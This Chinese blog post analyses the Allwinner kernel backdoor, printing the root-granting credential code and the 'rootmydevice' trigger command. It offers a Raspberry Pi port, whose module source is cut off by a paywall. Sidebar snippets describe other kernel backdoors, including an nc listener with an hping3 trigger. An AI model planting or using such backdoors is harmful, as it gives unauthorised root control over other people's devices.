全志的 Linux 内核后门分析

最新推荐文章于 2025-11-27 12:07:20 发布
原创 最新推荐文章于 2025-11-27 12:07:20 发布 · 2.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#raspberry pi #kernel #内核

本文探讨了全志开发人员在Linux内核中留下的后门事件,该后门允许普通用户通过输入特定命令获得root权限。内容包括后门的工作原理,以及将后门移植到raspberry pi 3上4.6内核的过程,并提供了修改后的代码示例。

最近全志开发人员在其kernel中留下后门一事闹得沸沸扬扬。还不知道的同学请参看
http://www.cnbeta.com/articles/501193.htm

通过写入rootmydevice/proc/sunxi-debug/sunxi-debug,一个普通用户就能拥有root的权限。实际作用代码片段如下:

cred->uid = GLOBAL_ROOT_UID;
cred->gid = GLOBAL_ROOT_GID;
cred->suid = GLOBAL_ROOT_UID;
cred->euid = GLOBAL_ROOT_UID;
cred->euid = GLOBAL_ROOT_UID;
cred->egid = GLOBAL_ROOT_GID;
cred->fsuid = GLOBAL_ROOT_UID;
cred->fsgid = GLOBAL_ROOT_GID;

本人将全志的这个后门移植到了raspberry pi 3的4.6内核,试了一下,确实好用。有兴趣的同学可以玩玩。下面是我修改过的代码。将其编译成模块,使用root插入这个模块后,任意一个用户执行如下命令,就会拥有root权限了。

echo “rootmydevice” > /proc/sunxi-debug/sunxi-debug

当这个模块被移除,拥有root权限的普通用户恢复原来的权限。

/*
 * Sunxi_debug.c
 *
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation.
 */
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/export.h>
#include <linux/kth
最低0.47元/天 解锁文章
全志平台BSP裁剪(5)rootfs裁剪--系统工具和库的裁剪
jzwjzw19900922的博客
01-04 2253
1.rootfs介绍 裁剪之前,我觉得有必要用一定的篇幅介绍一下rootfs (1)rootfs目录 (2)命令解析 而内核的命令串为:root=/dev/mtdblock2 devfs=mount load_ramdisk=0 inti=/linuxrc console=ttyS0,115200 display=shp240 root=...
这是gpt o1给出的物联网工程专业的大学规划,没有人看看这个合理吗?
m0_57828020的博客
02-12 903
只要坚持这个思路,你不仅会在毕业时拥有极高的 IoT 就业竞争力,也能在未来长久保持对物联网行业的**深度掌握**与**技术前沿**的探索能力。|**阶段2**|**大三上学期 + 寒假**|嵌入式 Linux、驱动开发;|**阶段1**|**大二下学期 + 暑假**|STM32 & RTOS 高级开发;|**阶段3**|**大三下学期 + 暑假**|工业 IoT 通信协议;|**阶段4**|**大四学年(含寒暑假)**|行业垂直应用(车联网/智慧医疗等);学习云原生、微服务、容器化及边缘计算;
Linux内核后门的原理及简单实战应用(转)
csd3176的博客
08-10 228
Linux内核后门的原理及简单实战应用(转)[@more@]   以下代码均在linux i86 2.0.x的内核下面测试通过。它也许可以在之前的版本通过,但并没有被测试过。因为从2.1.x内核版本就引入了相当大的改变,显著...
Linux内核后门
哈兜King
02-09 854
if((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;    像不像wait4函数,正常情况下没有任何影响,但是如果调用程序故意传入非法值,if表达式的第二部分就会执行。该部分会将程序的用户ID(current->uid)设为0,在Linux中就是root用户。
你的服务器藏了多少个“特权后门”?—— Linux SUID文件排查记
最新发布
Bruce_xiaowei的博客
11-27 572
摘要: Linux系统中的SUID权限机制(允许用户以文件所有者权限执行程序)既是管理便利工具,也是高危攻击向量。文章分析了Exim4邮件服务器(历史漏洞重灾区)、pppd守护进程(dip组权限风险)、Polkit组件(近年严重漏洞)等高危SUID程序,以及kismet工具集等中等风险程序。提供了立即执行的检测命令(如find / -type f -perm -04000)、权限优化策略(最小权限原则)、系统更新方法和高级监控配置(auditd规则)。强调企业环境中需建立基线配置管理、实时威胁检测和持续漏洞
kopycat:Linux内核无模块植入(后门
03-05
0 KOPYCAT-Linux内核模块的植入程序(后门) 用法 $ make $ sudo insmod kopycat.ko insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device $ lsmod | grep kopycat $ cat /proc/modules | grep kopycat 启动nc侦听器: $ nc -l 6666 通过发送带有秘密短语的ICMP数据包来触发后门: $ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1 作者 2021年
关于Linux内核后门的原理和简单实战
热门推荐
优快云_document的专栏
07-11 1万+
      作者:中华补天网用户空间与内核空间linux是一个具有保护模式的操作系统。它一直工作在i386 cpu的保护模式之下。内存被分为两个单元: 内核区域和用户区域。(译者注:我觉得还是这样叫比较顺口)内核区域存放并运行着核心代码,当然,顾名思义,用户区域也存放并运行用户程序。当然,作为用户进程来讲它是不能访问内核区域内存空间以及其他用户进程的地址空间的。     不幸地是, 核心进程也有同
linux 内核 后门,一个简单的Linux内核后门原型(ZT)
weixin_35336727的博客
04-30 279
作者:wzt 这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵/** Kernel mode connect backdoor,haha~** just a demo module to teach you how to write a backdoor in kernel mode,* i belive you can add more code to make ...
全志平台安全启动机制揭秘:Secure Boot + TrustZone 实现路径的4层防护体系分析
# 全志平台安全启动与TrustZone纵深防御体系深度解析 在智能设备无处不在的今天,从家里的摄像头到工厂的PLC控制器,再到电网中的配电终端——这些嵌入式系统的安全性早已不再是“可有可无”的附加功能。一旦被攻破...
全志平台OTA升级机制设计:差分更新+签名验证+安全回滚的高可靠方案全流程解析
# 全志平台OTA升级系统的可靠性与安全实践 在智能家居设备日益复杂的今天,确保固件更新既高效又不“变砖”,已成为嵌入式开发中的核心挑战。尤其对于像全志H7、T507这类广泛应用于AIoT网关和工业控制的SoC平台,一...
Linux内核模块入门之简单内核后门
m0_73494896的博客
09-03 1416
Linux内核支持运行时动态扩展,即运行时动态加载内核扩展模块(.ko文件),ko文件所包含的代码经加载后即成为内核代码的一部分,拥有内核特权,可以调用内核其它组件,访问内核空间数据以及操作硬件。当然也有跟内核代码一样的限制,如较小的函数调用栈,不支持浮点运算等。此外,由于众所周知的原因,开发内核模块,只能使用C语言。
全志系列芯片android与Linux内核按键驱动源码
10-20
全志系列芯片android与Linux内核按键驱动源码
权限维持-Linux-内核加载 LKM-Rootkit 后门
金灰的博客
07-08 1501
免责声明:本文仅做技术交流与学习...
linux内核启动后门,Linux下编写隐蔽的自启动回连后门
weixin_35683252的博客
04-30 415
一直很想补充LKM方式未实现的ROOTKIT的后门功能,奈何内核模式下虽然权限很高,但编程难度也很大。在网络安全技术中用户级程序虽然权限不高,但是编程相对简单,兼容性好。所以一般ROOTKIT也不是全部在内核中完成的,也要编写用户级的程序来辅助。本文将讲述回连后门的编写和在Linux下隐蔽地自启动的方法。回连后门的编写很容易实现,在一个典型的Socket客户端的基础上,将标准输入输出重定向到Soc...
【转载】全志Linux 内核后门分析
seiyaaa的专栏
03-22 616
据外媒 arstechnica 报道,一家中国的芯片级系统厂商全志(allwinner) 在其开发的产品中携带的内核里遗留了一个 root 后门。该公司使用的内核 linux-3.4-sunxi,原先用于支持全志的 ARM 芯片平板上的 Android,它也有一个社区版本。本人将全志的这个后门移植到了raspberry pi 3的4.6内核,试了一下,确实好用。通过写入rootmydevice到/proc/sunxi-debug/sunxi-debug,一个普通用户就能拥有root的权限。
Linux 内核后门的原理和简单实战
Top大杂烩
05-31 2588
用户空间与内核空间---------------------------linux是一个具有保护模式的操作系统。它一直工作在i386 cpu的保护模式之下。  <!--google_ad_client = "pub-2299987709779770";google_ad_width = 300;google_ad_heigh
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
05-07 4411
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
全志A10_linux3.0内核编译记录
02-05 2018
这次为了编译这个内核花费了我半个多月的时间.期间学习了不少关于内核的makfile和android编译的知识,也了解了下buildroot这个工具.写点东西记录一下把.blog写的不多,条理不清晰,有漏洞请见谅,只是提供个关键词给搜索的人. 第一次尝试编译时按照  Android A10(4.0.3)系统编译详解.pdf  编译打包出来的镜像可用,但是内核没有生成Module.symvers .
全志linux视频硬解码,全志H264硬件编解码程序 【转】
weixin_35916518的博客
05-13 2260
root@ubuntu:/opt/c600/linux-3.10# find drivers/ |grep \\.o$ |grep sundrivers/char/sunxi-di/built-in.odrivers/char/sunxi-scr/built-in.odrivers/char/sunxi_sys_info/chipid-sunxi.odrivers/char/sunxi_sys_i...
深入分析LINUX0.11内核源码的中文注释
学习和分析 Linux 0.11 源码可以帮助我们深入了解操作系统的基本原理和内核编程的基本技能,为学习更复杂和现代的操作系统打下坚实的基础。 ### 结语 虽然 Linux 0.11 版本已经非常老旧,但它对于学术研究和教育...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值